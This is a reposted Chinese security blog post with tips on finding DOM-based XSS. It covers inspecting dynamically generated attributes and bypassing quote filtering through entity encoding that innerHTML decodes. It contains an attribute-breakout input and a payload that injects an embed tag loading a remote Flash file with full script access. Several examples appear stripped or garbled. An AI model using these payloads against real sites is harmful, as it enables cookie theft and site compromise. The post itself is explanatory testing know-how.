关于DOM xss跨站一点点经验

admin 2021年4月3日19:59:28评论50 views字数 1371阅读4分34秒阅读模式

Xss的危害各位小牛 大牛们都意识到了 Xss开始的csrf和挂马 到盗cookies和ajax 到xssshell 还有各种利用....

我们一般找到的都是大多数都停留在找直接输入输出上,这类型的一般很容易被过滤。

隐蔽型的就是DOM xss了.

也就是不是直接输出的,

换句话话说,输出内容,在源代码里看不到.

比如你这里这个的话, 你右键,查看源代码的话 内容都是直接可以看到的这种就是直接 输入输出的  

1.jpg

这个就是直接输出类型

对于查找DOM XSS的基本方法:

一般是这样的, 先发一个正常的内容,

然后 F12打开调试工具(火狐Firebug插件);

定位到你发的内容上,调试工具里,有一个箭头,可以选择网页里指定的位置的.

2.jpg

然后看你发送的内容里 有没有什么隐藏的属性 或自定义属性 哦 通常的情况是 xxxxxxx

而且,“你输入的某句话”  ,你直接查看源代码是看不到的  换句话说,  xxxxxxx 这个 是被动态产生

这个时候,就有潜在的问题来了。 如果 “你输入的某句话”   写为 xxxxxxxxx">    会变成 xxxxxxx
就会插入一个HTML标签进去了

但是 实际情况下," , > 都是被过滤的 (到了这里一般的黑友会说转义了过滤了啊没得突破了-_-我曾经也是这样)

你输入的某句话 写为

xxxxxxxxx"><img><"

由于是动态产生的 最后 " 会自动变为 "  大家觉得很奇怪吧等下解释

>--->   >
< ----> 

所以最后效果还是 xxxxxxx (而且很多程序员,没有过滤 & )

下面我们本地测试下

x

内容就是我们输入的内容如

测试一下

'一个编码列子再给大家写个列子

mp3;http://xsst.sinaapp.com/Xss.swf"><embed data-original="http://xsst.sinaapp.com/Xss.swf" src=""type="application/x-shockwave-flash"allowscriptaccess="always"><#.mp3

xxx.innerHTML= yyy.某个属性- -成功编码绕过("=&quot=')编码问题不是我开发的别问我了-_-~!

我们还可以这样来测试下

x

Unicode字符列表:http://zh.wikipedia.org/wiki/Unicode%E5%AD%97%E7%AC%A6%E5%88%97%E8%A1%A8

Xss安全测试字符转换工具:http://app.baidu.com/app/enter?appid=280383

转自:http://www.90sec.org/thread-2693-1-1.html

文章来源于lcx.cc:关于DOM xss跨站一点点经验

相关推荐: 利用Chrome插件向指定页面植入js,劫持 XSS,一些猥琐的想法与实践

0x00 Chrome插件 -------------------------- 这个想法是昨天看到@紫梦芊 的帖子想起来的。 想法如下: Chrome插件是可以通过manifest.json的控制,向指定页面植入contentscript.js里的脚本的。那…

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月3日19:59:28
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   关于DOM xss跨站一点点经验http://cn-sec.com/archives/324764.html

发表评论

匿名网友 填写信息